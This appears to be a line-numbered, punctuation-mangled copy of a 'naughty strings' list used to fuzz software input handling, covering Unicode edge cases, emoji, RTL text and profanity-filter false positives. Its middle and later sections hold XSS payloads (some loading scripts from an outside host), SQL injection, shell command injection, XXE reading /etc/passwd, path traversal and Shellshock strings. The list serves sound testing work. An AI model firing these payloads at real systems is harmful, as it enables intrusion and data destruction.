3 __Strings_which_may_be_used_elsewhere_in_code
27 __Strings_which_can_be_interpreted_as_numeric
47 -9223372036854775808_-1
69 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
83 123456789012345678901234567890123456789
99 2.2250738585072011e-308
103 __ASCII_punctuation.__All_of_these_characters_may_need_to_be_escaped_in_some
104 __contexts.__Divided_into_three_groups_based_on_(US-layout)_keyboard_position.
110 __Non-whitespace_C0_controls:_U+0001_through_U+0008,_U+000E_through_U+001F,
112 __Often_forbidden_to_appear_in_various_text-based_file_formats_(e.g._XML),
113 __or_reused_for_internal_delimiters_on_the_theory_that_they_should_never
115 __The_next_line_may_appear_to_be_blank_or_mojibake_in_some_viewers.
116 ___________________________
118 __Non-whitespace_C1_controls:_U+0080_through_U+0084_and_U+0086_through_U+009F.
119 __Commonly_misinterpreted_as_additional_graphic_characters.
120 __The_next_line_may_appear_to_be_blank,_mojibake,_or_dingbats_in_some_viewers.
121 _______________________________
123 __Whitespace:_all_of_the_characters_with_category_Zs,_Zl,_or_Zp_(in_Unicode
124 __version_8.0.0),_plus_U+0009_(HT),_U+000B_(VT),_U+000C_(FF),_U+0085_(NEL),
125 __and_U+200B_(ZERO_WIDTH_SPACE),_which_are_in_the_C_categories_but_are_often
126 __treated_as_whitespace_in_some_contexts.
127 __This_file_unfortunately_cannot_express_strings_containing
128 __U+0000,_U+000A,_or_U+000D_(NUL,_LF,_CR).
129 __The_next_line_may_appear_to_be_blank_or_mojibake_in_some_viewers.
130 __The_next_line_may_be_flagged_for__trailing_whitespace__in_some_viewers.
133 __Unicode_additional_control_characters:_all_of_the_characters_with
134 __general_category_Cf_(in_Unicode_8.0.0).
135 __The_next_line_may_appear_to_be_blank_or_mojibake_in_some_viewers.
136
138 ___Byte_order_marks_,_U+FEFF_and_U+FFFE,_each_on_its_own_line.
139 __The_next_two_lines_may_appear_to_be_blank_or_mojibake_in_some_viewers.
145 __Strings_which_contain_common_unicode_symbols_(e.g._smart_quotes)
156 ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
159 __Unicode_Subscript_Superscript_Accents
161 __Strings_which_contain_unicode_subscripts_superscripts;_can_cause_rendering_issues
166 ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้
170 __Strings_which_contain_misplaced_quotation_marks;_can_cause_encoding_errors
184 __Two-Byte_Characters
186 __Strings_which_contain_two-byte_characters:_can_cause_rendering_issues_or_character-length_issues
193 찦차를_타고_온_펲시맨과_쑛다리_똠방각하
198 __Strings_which_contain_two-byte_letters:_can_cause_issues_with_naïve_UTF-16_capitalizers_which_think_that_16_bits_==_1_character
200 𐐜_𐐔𐐇𐐝𐐀𐐡𐐇𐐓_𐐙𐐊𐐡𐐝𐐓_𐐝𐐇𐐗𐐊𐐤𐐔_𐐒𐐋𐐗_𐐒𐐌_𐐜_𐐡𐐀𐐖𐐇𐐤𐐓𐐝_𐐱𐑂_𐑄_𐐔𐐇𐐝𐐀𐐡𐐇𐐓_𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆
202 __Special_Unicode_Characters_Union
204 __A_super_string_recommended_by_VMware_Inc._Globalization_Team:_can_effectively_cause_rendering_issues_or_character-length_issues_to_validate_product_globalization_readiness.
206 __表__________CJK_UNIFIED_IDEOGRAPHS_(U+8868)
207 __ポ__________KATAKANA_LETTER_PO_(U+30DD)
208 __あ__________HIRAGANA_LETTER_A_(U+3042)
209 __A___________LATIN_CAPITAL_LETTER_A_(U+0041)
210 __鷗__________CJK_UNIFIED_IDEOGRAPHS_(U+9DD7)
211 __Œ___________LATIN_SMALL_LIGATURE_OE_(U+0153)_
212 __é___________LATIN_SMALL_LETTER_E_WITH_ACUTE_(U+00E9)
213 __B___________FULLWIDTH_LATIN_CAPITAL_LETTER_B_(U+FF22)
214 __逍__________CJK_UNIFIED_IDEOGRAPHS_(U+900D)
215 __Ü___________LATIN_SMALL_LETTER_U_WITH_DIAERESIS_(U+00FC)
216 __ß___________LATIN_SMALL_LETTER_SHARP_S_(U+00DF)
217 __ª___________FEMININE_ORDINAL_INDICATOR_(U+00AA)
218 __ą___________LATIN_SMALL_LETTER_A_WITH_OGONEK_(U+0105)
219 __ñ___________LATIN_SMALL_LETTER_N_WITH_TILDE_(U+00F1)
220 __丂__________CJK_UNIFIED_IDEOGRAPHS_(U+4E02)
221 __㐀__________CJK_Ideograph_Extension_A,_First_(U+3400)
222 __𠀀__________CJK_Ideograph_Extension_B,_First_(U+20000)
226 __Changing_length_when_lowercased
228 __Characters_which_increase_in_length_(2_to_3_bytes)_when_lowercased
229 __Credit:_https:__twitter.com_jifa_status_625776454479970304
236 __Strings_which_consists_of_Japanese-style_emoticons_which_are_popular_on_the_web
244 ,。・:*:・゜’(_☻_ω_☻_)。・:*:・゜’
253 __Strings_which_contain_Emoji;_should_be_the_same_behavior_as_two-byte_characters,_but_not_always
257 👨🦰_👨🏿🦰_👨🦱_👨🏿🦱_🦹🏿♂️
260 ❤️_💔_💌_💕_💞_💓_💗_💖_💘_💝_💟_💜_💛_💚_💙
262 👨👩👦_👨👩👧👦_👨👨👦_👩👩👧_👨👦_👨👧👦_👩👦_👩👧👦
264 0️⃣_1️⃣_2️⃣_3️⃣_4️⃣_5️⃣_6️⃣_7️⃣_8️⃣_9️⃣_🔟
266 ________Regional_Indicator_Symbols
268 ________Regional_Indicator_Symbols_can_be_displayed_differently_across
269 ________fonts,_and_have_a_number_of_special_behaviors
277 __Strings_which_contain_unicode_numbers;_if_the_code_is_localized,_it_should_see_the_input_as_numeric
282 __Right-To-Left_Strings
284 __Strings_which_contain_text_that_should_be_rendered_RTL_if_possible_(e.g._Arabic,_Hebrew)
286 ثم_نفس_سقطت_وبالتحديد،,_جزيرتي_باستخدام_أن_دنو._إذ_هنا؟_الستار_وتنصيب_كان._أهّل_ايطاليا،_بريطانيا-فرنسا_قد_أخذ._سليمان،_إتفاقية_بين_ما,_يذكر_.
287 בְּרֵאשִׁית,_בָּרָא_אֱלֹהִים,_אֵת_הַשָּׁמַיִם,_וְאֵת_הָאָרֶץ
288 הָיְתָהtestالصفحات_التّحول
291 مُنَاقَشَةُ_سُبُلِ_اِسْتِخْدَامِ_اللُّغَةِ_فِي_النُّظُمِ_الْقَائِمَةِ_وَفِيم_يَخُصَّ_التَّطْبِيقَاتُ_الْحاسُوبِيَّةُ،
292 الكل_في_المجمو_عة_(5)
296 __The_only_unicode_alphabet_to_use_a_space_which_isn't_empty_but_should_still_act_like_a_space.
303 __Strings_which_contain_unicode_with_unusual_properties_(e.g._Right-to-left_override)_(c.f._http:__www.unicode.org_charts_PDF_U2000.pdf)
313 __Strings_which_contain__corrupted__text._The_corruption_will_not_appear_in_non-HTML_text,_however._(via_http:__www.eeemo.net)
315 Ṱ̺̺̕o͞_̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤_̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎_̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳_̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠.̨̹͈̣
316 ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎_̰t͔̦h̞̲e̢̤_͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍_̨o͚̪͡f̘̣̬_̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖.̛̖̞̠̫̰
317 ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔_͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜_̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟_̯̲͕͞ǫ̟̯̰.̟
318 ̦H̬̤̗̤͝e͜_̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮_҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕_̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖_̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ_̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹.͕
319 Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
323 __Strings_which_contain_unicode_with_an__upsidedown__effect_(via_http:__www.upsidedowntext.com)
325 ˙ɐnbᴉlɐ_ɐuƃɐɯ_ǝɹolop_ʇǝ_ǝɹoqɐl_ʇn_ʇunpᴉpᴉɔuᴉ_ɹodɯǝʇ_poɯsnᴉǝ_op_pǝs_'ʇᴉlǝ_ƃuᴉɔsᴉdᴉpɐ_ɹnʇǝʇɔǝsuoɔ_'ʇǝɯɐ_ʇᴉs_ɹolop_ɯnsdᴉ_ɯǝɹo˥
330 __Strings_which_contain_bold_italic_etc._versions_of_normal_characters
332 The_quick_brown_fox_jumps_over_the_lazy_dog
333 𝐓𝐡𝐞_𝐪𝐮𝐢𝐜𝐤_𝐛𝐫𝐨𝐰𝐧_𝐟𝐨𝐱_𝐣𝐮𝐦𝐩𝐬_𝐨𝐯𝐞𝐫_𝐭𝐡𝐞_𝐥𝐚𝐳𝐲_𝐝𝐨𝐠
334 𝕿𝖍𝖊_𝖖𝖚𝖎𝖈𝖐_𝖇𝖗𝖔𝖜𝖓_𝖋𝖔𝖝_𝖏𝖚𝖒𝖕𝖘_𝖔𝖛𝖊𝖗_𝖙𝖍𝖊_𝖑𝖆𝖟𝖞_𝖉𝖔𝖌
335 𝑻𝒉𝒆_𝒒𝒖𝒊𝒄𝒌_𝒃𝒓𝒐𝒘𝒏_𝒇𝒐𝒙_𝒋𝒖𝒎𝒑𝒔_𝒐𝒗𝒆𝒓_𝒕𝒉𝒆_𝒍𝒂𝒛𝒚_𝒅𝒐𝒈
336 𝓣𝓱𝓮_𝓺𝓾𝓲𝓬𝓴_𝓫𝓻𝓸𝔀𝓷_𝓯𝓸𝔁_𝓳𝓾𝓶𝓹𝓼_𝓸𝓿𝓮𝓻_𝓽𝓱𝓮_𝓵𝓪𝔃𝔂_𝓭𝓸𝓰
337 𝕋𝕙𝕖_𝕢𝕦𝕚𝕔𝕜_𝕓𝕣𝕠𝕨𝕟_𝕗𝕠𝕩_𝕛𝕦𝕞𝕡𝕤_𝕠𝕧𝕖𝕣_𝕥𝕙𝕖_𝕝𝕒𝕫𝕪_𝕕𝕠𝕘
338 𝚃𝚑𝚎_𝚚𝚞𝚒𝚌𝚔_𝚋𝚛𝚘𝚠𝚗_𝚏𝚘𝚡_𝚓𝚞𝚖𝚙𝚜_𝚘𝚟𝚎𝚛_𝚝𝚑𝚎_𝚕𝚊𝚣𝚢_𝚍𝚘𝚐
339 ⒯⒣⒠_⒬⒰⒤⒞⒦_⒝⒭⒪⒲⒩_⒡⒪⒳_⒥⒰⒨⒫⒮_⒪⒱⒠⒭_⒯⒣⒠_⒧⒜⒵⒴_⒟⒪⒢
343 __Strings_which_attempt_to_invoke_a_benign_script_injection;_shows_vulnerability_to_XSS
345 _script_alert(0)__script_
346 _lt;script_gt;alert(__39;1__39;);_lt;_script_gt;
347 _img_src=x_onerror=alert(2)___
348 _svg__script_123_1_alert(3)__script_
349 ___script_alert(4)__script_
350 '__script_alert(5)__script_
351 __script_alert(6)__script_
352 __script__script_alert(7)__script_
353 ____script____script__alert(8)____script__
354 onfocus=JaVaSCript:alert(9)_autofocus
355 __onfocus=JaVaSCript:alert(10)_autofocus
356 '_onfocus=JaVaSCript:alert(11)_autofocus
357 <script>alert(12)<_script>
358 _sc_script_ript_alert(13)__sc__script_ript_
359 --__script_alert(14)__script_
364 src=JaVaSCript:prompt(19)
365 ___script_alert(20);__script_x=_
366 '__script_alert(21);__script_x='
367 __script_alert(22);__script_x=
368 __autofocus_onkeyup=_javascript:alert(23)
369 '_autofocus_onkeyup='javascript:alert(24)
370 _script_x20type=_text_javascript__javascript:alert(25);__script_
371 _script_x3Etype=_text_javascript__javascript:alert(26);__script_
372 _script_x0Dtype=_text_javascript__javascript:alert(27);__script_
373 _script_x09type=_text_javascript__javascript:alert(28);__script_
374 _script_x0Ctype=_text_javascript__javascript:alert(29);__script_
375 _script_x2Ftype=_text_javascript__javascript:alert(30);__script_
376 _script_x0Atype=_text_javascript__javascript:alert(31);__script_
377 '_____x3Cscript_javascript:alert(32)__script_
378 '_____x00script_javascript:alert(33)__script_
379 ABC_div_style=_x_x3Aexpression(javascript:alert(34)__DEF
380 ABC_div_style=_x:expression_x5C(javascript:alert(35)__DEF
381 ABC_div_style=_x:expression_x00(javascript:alert(36)__DEF
382 ABC_div_style=_x:exp_x00ression(javascript:alert(37)__DEF
383 ABC_div_style=_x:exp_x5Cression(javascript:alert(38)__DEF
384 ABC_div_style=_x:_x0Aexpression(javascript:alert(39)__DEF
385 ABC_div_style=_x:_x09expression(javascript:alert(40)__DEF
386 ABC_div_style=_x:_xE3_x80_x80expression(javascript:alert(41)__DEF
387 ABC_div_style=_x:_xE2_x80_x84expression(javascript:alert(42)__DEF
388 ABC_div_style=_x:_xC2_xA0expression(javascript:alert(43)__DEF
389 ABC_div_style=_x:_xE2_x80_x80expression(javascript:alert(44)__DEF
390 ABC_div_style=_x:_xE2_x80_x8Aexpression(javascript:alert(45)__DEF
391 ABC_div_style=_x:_x0Dexpression(javascript:alert(46)__DEF
392 ABC_div_style=_x:_x0Cexpression(javascript:alert(47)__DEF
393 ABC_div_style=_x:_xE2_x80_x87expression(javascript:alert(48)__DEF
394 ABC_div_style=_x:_xEF_xBB_xBFexpression(javascript:alert(49)__DEF
395 ABC_div_style=_x:_x20expression(javascript:alert(50)__DEF
396 ABC_div_style=_x:_xE2_x80_x88expression(javascript:alert(51)__DEF
397 ABC_div_style=_x:_x00expression(javascript:alert(52)__DEF
398 ABC_div_style=_x:_xE2_x80_x8Bexpression(javascript:alert(53)__DEF
399 ABC_div_style=_x:_xE2_x80_x86expression(javascript:alert(54)__DEF
400 ABC_div_style=_x:_xE2_x80_x85expression(javascript:alert(55)__DEF
401 ABC_div_style=_x:_xE2_x80_x82expression(javascript:alert(56)__DEF
402 ABC_div_style=_x:_x0Bexpression(javascript:alert(57)__DEF
403 ABC_div_style=_x:_xE2_x80_x81expression(javascript:alert(58)__DEF
404 ABC_div_style=_x:_xE2_x80_x83expression(javascript:alert(59)__DEF
405 ABC_div_style=_x:_xE2_x80_x89expression(javascript:alert(60)__DEF
406 _a_href=__x0Bjavascript:javascript:alert(61)__id=_fuzzelement1__test__a_
407 _a_href=__x0Fjavascript:javascript:alert(62)__id=_fuzzelement1__test__a_
408 _a_href=__xC2_xA0javascript:javascript:alert(63)__id=_fuzzelement1__test__a_
409 _a_href=__x05javascript:javascript:alert(64)__id=_fuzzelement1__test__a_
410 _a_href=__xE1_xA0_x8Ejavascript:javascript:alert(65)__id=_fuzzelement1__test__a_
411 _a_href=__x18javascript:javascript:alert(66)__id=_fuzzelement1__test__a_
412 _a_href=__x11javascript:javascript:alert(67)__id=_fuzzelement1__test__a_
413 _a_href=__xE2_x80_x88javascript:javascript:alert(68)__id=_fuzzelement1__test__a_
414 _a_href=__xE2_x80_x89javascript:javascript:alert(69)__id=_fuzzelement1__test__a_
415 _a_href=__xE2_x80_x80javascript:javascript:alert(70)__id=_fuzzelement1__test__a_
416 _a_href=__x17javascript:javascript:alert(71)__id=_fuzzelement1__test__a_
417 _a_href=__x03javascript:javascript:alert(72)__id=_fuzzelement1__test__a_
418 _a_href=__x0Ejavascript:javascript:alert(73)__id=_fuzzelement1__test__a_
419 _a_href=__x1Ajavascript:javascript:alert(74)__id=_fuzzelement1__test__a_
420 _a_href=__x00javascript:javascript:alert(75)__id=_fuzzelement1__test__a_
421 _a_href=__x10javascript:javascript:alert(76)__id=_fuzzelement1__test__a_
422 _a_href=__xE2_x80_x82javascript:javascript:alert(77)__id=_fuzzelement1__test__a_
423 _a_href=__x20javascript:javascript:alert(78)__id=_fuzzelement1__test__a_
424 _a_href=__x13javascript:javascript:alert(79)__id=_fuzzelement1__test__a_
425 _a_href=__x09javascript:javascript:alert(80)__id=_fuzzelement1__test__a_
426 _a_href=__xE2_x80_x8Ajavascript:javascript:alert(81)__id=_fuzzelement1__test__a_
427 _a_href=__x14javascript:javascript:alert(82)__id=_fuzzelement1__test__a_
428 _a_href=__x19javascript:javascript:alert(83)__id=_fuzzelement1__test__a_
429 _a_href=__xE2_x80_xAFjavascript:javascript:alert(84)__id=_fuzzelement1__test__a_
430 _a_href=__x1Fjavascript:javascript:alert(85)__id=_fuzzelement1__test__a_
431 _a_href=__xE2_x80_x81javascript:javascript:alert(86)__id=_fuzzelement1__test__a_
432 _a_href=__x1Djavascript:javascript:alert(87)__id=_fuzzelement1__test__a_
433 _a_href=__xE2_x80_x87javascript:javascript:alert(88)__id=_fuzzelement1__test__a_
434 _a_href=__x07javascript:javascript:alert(89)__id=_fuzzelement1__test__a_
435 _a_href=__xE1_x9A_x80javascript:javascript:alert(90)__id=_fuzzelement1__test__a_
436 _a_href=__xE2_x80_x83javascript:javascript:alert(91)__id=_fuzzelement1__test__a_
437 _a_href=__x04javascript:javascript:alert(92)__id=_fuzzelement1__test__a_
438 _a_href=__x01javascript:javascript:alert(93)__id=_fuzzelement1__test__a_
439 _a_href=__x08javascript:javascript:alert(94)__id=_fuzzelement1__test__a_
440 _a_href=__xE2_x80_x84javascript:javascript:alert(95)__id=_fuzzelement1__test__a_
441 _a_href=__xE2_x80_x86javascript:javascript:alert(96)__id=_fuzzelement1__test__a_
442 _a_href=__xE3_x80_x80javascript:javascript:alert(97)__id=_fuzzelement1__test__a_
443 _a_href=__x12javascript:javascript:alert(98)__id=_fuzzelement1__test__a_
444 _a_href=__x0Djavascript:javascript:alert(99)__id=_fuzzelement1__test__a_
445 _a_href=__x0Ajavascript:javascript:alert(100)__id=_fuzzelement1__test__a_
446 _a_href=__x0Cjavascript:javascript:alert(101)__id=_fuzzelement1__test__a_
447 _a_href=__x15javascript:javascript:alert(102)__id=_fuzzelement1__test__a_
448 _a_href=__xE2_x80_xA8javascript:javascript:alert(103)__id=_fuzzelement1__test__a_
449 _a_href=__x16javascript:javascript:alert(104)__id=_fuzzelement1__test__a_
450 _a_href=__x02javascript:javascript:alert(105)__id=_fuzzelement1__test__a_
451 _a_href=__x1Bjavascript:javascript:alert(106)__id=_fuzzelement1__test__a_
452 _a_href=__x06javascript:javascript:alert(107)__id=_fuzzelement1__test__a_
453 _a_href=__xE2_x80_xA9javascript:javascript:alert(108)__id=_fuzzelement1__test__a_
454 _a_href=__xE2_x80_x85javascript:javascript:alert(109)__id=_fuzzelement1__test__a_
455 _a_href=__x1Ejavascript:javascript:alert(110)__id=_fuzzelement1__test__a_
456 _a_href=__xE2_x81_x9Fjavascript:javascript:alert(111)__id=_fuzzelement1__test__a_
457 _a_href=__x1Cjavascript:javascript:alert(112)__id=_fuzzelement1__test__a_
458 _a_href=_javascript_x00:javascript:alert(113)__id=_fuzzelement1__test__a_
459 _a_href=_javascript_x3A:javascript:alert(114)__id=_fuzzelement1__test__a_
460 _a_href=_javascript_x09:javascript:alert(115)__id=_fuzzelement1__test__a_
461 _a_href=_javascript_x0D:javascript:alert(116)__id=_fuzzelement1__test__a_
462 _a_href=_javascript_x0A:javascript:alert(117)__id=_fuzzelement1__test__a_
463 __'__img_src=xxx:x__x0Aonerror=javascript:alert(118)_
464 __'__img_src=xxx:x__x22onerror=javascript:alert(119)_
465 __'__img_src=xxx:x__x0Bonerror=javascript:alert(120)_
466 __'__img_src=xxx:x__x0Donerror=javascript:alert(121)_
467 __'__img_src=xxx:x__x2Fonerror=javascript:alert(122)_
468 __'__img_src=xxx:x__x09onerror=javascript:alert(123)_
469 __'__img_src=xxx:x__x0Conerror=javascript:alert(124)_
470 __'__img_src=xxx:x__x00onerror=javascript:alert(125)_
471 __'__img_src=xxx:x__x27onerror=javascript:alert(126)_
472 __'__img_src=xxx:x__x20onerror=javascript:alert(127)_
473 __'__script__x3Bjavascript:alert(128)__script_
474 __'__script__x0Djavascript:alert(129)__script_
475 __'__script__xEF_xBB_xBFjavascript:alert(130)__script_
476 __'__script__xE2_x80_x81javascript:alert(131)__script_
477 __'__script__xE2_x80_x84javascript:alert(132)__script_
478 __'__script__xE3_x80_x80javascript:alert(133)__script_
479 __'__script__x09javascript:alert(134)__script_
480 __'__script__xE2_x80_x89javascript:alert(135)__script_
481 __'__script__xE2_x80_x85javascript:alert(136)__script_
482 __'__script__xE2_x80_x88javascript:alert(137)__script_
483 __'__script__x00javascript:alert(138)__script_
484 __'__script__xE2_x80_xA8javascript:alert(139)__script_
485 __'__script__xE2_x80_x8Ajavascript:alert(140)__script_
486 __'__script__xE1_x9A_x80javascript:alert(141)__script_
487 __'__script__x0Cjavascript:alert(142)__script_
488 __'__script__x2Bjavascript:alert(143)__script_
489 __'__script__xF0_x90_x96_x9Ajavascript:alert(144)__script_
490 __'__script_-javascript:alert(145)__script_
491 __'__script__x0Ajavascript:alert(146)__script_
492 __'__script__xE2_x80_xAFjavascript:alert(147)__script_
493 __'__script__x7Ejavascript:alert(148)__script_
494 __'__script__xE2_x80_x87javascript:alert(149)__script_
495 __'__script__xE2_x81_x9Fjavascript:alert(150)__script_
496 __'__script__xE2_x80_xA9javascript:alert(151)__script_
497 __'__script__xC2_x85javascript:alert(152)__script_
498 __'__script__xEF_xBF_xAEjavascript:alert(153)__script_
499 __'__script__xE2_x80_x83javascript:alert(154)__script_
500 __'__script__xE2_x80_x8Bjavascript:alert(155)__script_
501 __'__script__xEF_xBF_xBEjavascript:alert(156)__script_
502 __'__script__xE2_x80_x80javascript:alert(157)__script_
503 __'__script__x21javascript:alert(158)__script_
504 __'__script__xE2_x80_x82javascript:alert(159)__script_
505 __'__script__xE2_x80_x86javascript:alert(160)__script_
506 __'__script__xE1_xA0_x8Ejavascript:alert(161)__script_
507 __'__script__x0Bjavascript:alert(162)__script_
508 __'__script__x20javascript:alert(163)__script_
509 __'__script__xC2_xA0javascript:alert(164)__script_
510 _img__x00src=x_onerror=_alert(165)__
511 _img__x47src=x_onerror=_javascript:alert(166)__
512 _img__x11src=x_onerror=_javascript:alert(167)__
513 _img__x12src=x_onerror=_javascript:alert(168)__
514 _img_x47src=x_onerror=_javascript:alert(169)__
515 _img_x10src=x_onerror=_javascript:alert(170)__
516 _img_x13src=x_onerror=_javascript:alert(171)__
517 _img_x32src=x_onerror=_javascript:alert(172)__
518 _img_x47src=x_onerror=_javascript:alert(173)__
519 _img_x11src=x_onerror=_javascript:alert(174)__
520 _img__x47src=x_onerror=_javascript:alert(175)__
521 _img__x34src=x_onerror=_javascript:alert(176)__
522 _img__x39src=x_onerror=_javascript:alert(177)__
523 _img__x00src=x_onerror=_javascript:alert(178)__
524 _img_src_x09=x_onerror=_javascript:alert(179)__
525 _img_src_x10=x_onerror=_javascript:alert(180)__
526 _img_src_x13=x_onerror=_javascript:alert(181)__
527 _img_src_x32=x_onerror=_javascript:alert(182)__
528 _img_src_x12=x_onerror=_javascript:alert(183)__
529 _img_src_x11=x_onerror=_javascript:alert(184)__
530 _img_src_x00=x_onerror=_javascript:alert(185)__
531 _img_src_x47=x_onerror=_javascript:alert(186)__
532 _img_src=x_x09onerror=_javascript:alert(187)__
533 _img_src=x_x10onerror=_javascript:alert(188)__
534 _img_src=x_x11onerror=_javascript:alert(189)__
535 _img_src=x_x12onerror=_javascript:alert(190)__
536 _img_src=x_x13onerror=_javascript:alert(191)__
537 _img_a__b__c_src_d_=x_e_onerror=_f__alert(192)__
538 _img_src=x_onerror=_x09_javascript:alert(193)__
539 _img_src=x_onerror=_x10_javascript:alert(194)__
540 _img_src=x_onerror=_x11_javascript:alert(195)__
541 _img_src=x_onerror=_x12_javascript:alert(196)__
542 _img_src=x_onerror=_x32_javascript:alert(197)__
543 _img_src=x_onerror=_x00_javascript:alert(198)__
544 _a_href=java__1__2__3__4__5__6__7__8__11__12script:javascript:alert(199)_XXX__a_
545 _img_src=_x____script_javascript:alert(200)__script______
546 _img_src_onerror____'_=_alt=javascript:alert(201)____
547 _title_onpropertychange=javascript:alert(202)___title__title_title=_
548 _a_href=http:__foo.bar__x=_y___a__img_alt=____img_src=x:x_onerror=javascript:alert(203)___a___
549 _!--_if___script_javascript:alert(204)__script_--_
550 _!--_if_img_src=x_onerror=javascript:alert(205)_____--_
551 _script_src=____(jscript)s____script_
552 _script_src=____(jscript)s____script_
553 _IMG______SCRIPT_alert(_206_)__SCRIPT___
554 _IMG_SRC=javascript:alert(String.fromCharCode(50,48,55))_
555 _IMG_SRC=__onmouseover=_alert('208')__
556 _IMG_SRC=_onmouseover=_alert('209')__
557 _IMG_onmouseover=_alert('210')__
558 _IMG_SRC=__106;__97;__118;__97;__115;__99;__114;__105;__112;__116;__58;__97;__108;__101;__114;__116;__40;__39;__50;__49;__49;__39;__41;_
559 _IMG_SRC=__0000106__0000097__0000118__0000097__0000115__0000099__0000114__0000105__0000112__0000116__0000058__0000097__0000108__0000101__0000114__0000116__0000040__0000039__0000050__0000049__0000050__0000039__0000041_
560 _IMG_SRC=__x6A__x61__x76__x61__x73__x63__x72__x69__x70__x74__x3A__x61__x6C__x65__x72__x74__x28__x27__x32__x31__x33__x27__x29_
561 _IMG_SRC=_jav_ _ascript:alert('214');__
562 _IMG_SRC=_jav__x09;ascript:alert('215');__
563 _IMG_SRC=_jav__x0A;ascript:alert('216');__
564 _IMG_SRC=_jav__x0D;ascript:alert('217');__
565 perl_-e_'print___IMG_SRC=java_0script:alert(__218__)__;'___out
566 _IMG_SRC=____14;_ javascript:alert('219');__
567 _SCRIPT_XSS_SRC=_http:__ha.ckers.org_xss.js____SCRIPT_
568 _BODY_onload!_$__()*~+-_.,:;_@_______=alert(_220_)_
569 _SCRIPT_SRC=_http:__ha.ckers.org_xss.js____SCRIPT_
570 __SCRIPT_alert(_221_);_____SCRIPT_
571 _SCRIPT_SRC=http:__ha.ckers.org_xss.js___B__
572 _SCRIPT_SRC=__ha.ckers.org_.j_
573 _IMG_SRC=_javascript:alert('222')_
574 _iframe_src=http:__ha.ckers.org_scriptlet.html__
576 _u_oncopy=alert()__Copy_me__u_
577 _i_onwheel=alert(224)__Scroll_over_me___i_
580 __textarea__script_alert(225)__script_
584 __Strings_which_can_cause_a_SQL_injection_if_inputs_are_not_sanitized
587 1';_DROP_TABLE_users--_1
590 ';_EXEC_sp_MSForEachTable_'DROP_TABLE__';_--
595 __Server_Code_Injection
597 __Strings_which_can_cause_user_to_run_code_on_server_as_a_privileged_user_(c.f._https:__news.ycombinator.com_item_id=7665153)
604 _dev_null;_touch__tmp_blns.fail_;_echo
605 _touch__tmp_blns.fail_
606 $(touch__tmp_blns.fail)
607 @__system__touch__tmp_blns.fail___
609 __Command_Injection_(Ruby)
611 __Strings_which_can_call_system_commands_within_Ruby_Rails_applications
613 eval(_puts_'hello_world'_)
616 Kernel.exec(_ls_-al___)
620 _______XXE_Injection_(XML)
622 __String_which_can_reveal_system_files_when_parsed_by_a_badly_configured_XML_parser
624 __xml_version=_1.0__encoding=_ISO-8859-1____!DOCTYPE_foo____!ELEMENT_foo_ANY___!ENTITY_xxe_SYSTEM__file:___etc_passwd______foo__xxe;__foo_
626 __Unwanted_Interpolation
628 __Strings_which_can_be_accidentally_expanded_into_different_strings_if_evaluated_in_the_wrong_context,_e.g._used_as_a_printf_format_string_or_via_Perl_or_shell_eval._Might_expose_sensitive_data_from_the_program_doing_the_interpolation,_or_might_just_repr.
642 __Strings_which_can_cause_user_to_pull_in_files_that_should_not_be_a_part_of_a_web_server
644 .._.._.._.._.._.._.._.._.._.._.._etc_passwd_00
645 .._.._.._.._.._.._.._.._.._.._.._etc_hosts
647 __Known_CVEs_and_Vulnerabilities
649 __Strings_that_test_for_known_vulnerabilities
651 ()___0;__;_touch__tmp_blns.shellshock1.fail;
652 ()____;______$($())____touch__tmp_blns.shellshock2.fail;__
656 __MSDOS_Windows_Special_Filenames
658 __Strings_which_are_reserved_characters_in_MSDOS_Windows
675 ____IRC_specific_strings
677 ____Strings_that_may_occur_on_IRC_clients_that_make_security_products_freak_out
679 DCC_SEND_STARTKEYLOGGER_0_0_0
683 __Innocuous_strings_which_may_be_blocked_by_profanity_filters_(https:__en.wikipedia.org_wiki_Scunthorpe_problem)
685 Scunthorpe_General_Hospital
686 Penistone_Community_Church
687 Lightwater_Country_Park
692 http:__www.cum.qc.ca_
693 Craig_Cockburn,_Software_Specialist
695 Dr._Herman_I._Libshitz
698 medieval_erection_of_parapets
710 __Strings_which_may_cause_human_to_reinterpret_worldview
712 If_you're_reading_this,_you've_been_in_a_coma_for_almost_20_years_now._We're_trying_a_new_technique._We_don't_know_where_this_message_will_end_up_in_your_dream,_but_we_hope_it_works._Please_wake_up,_we_miss_you.
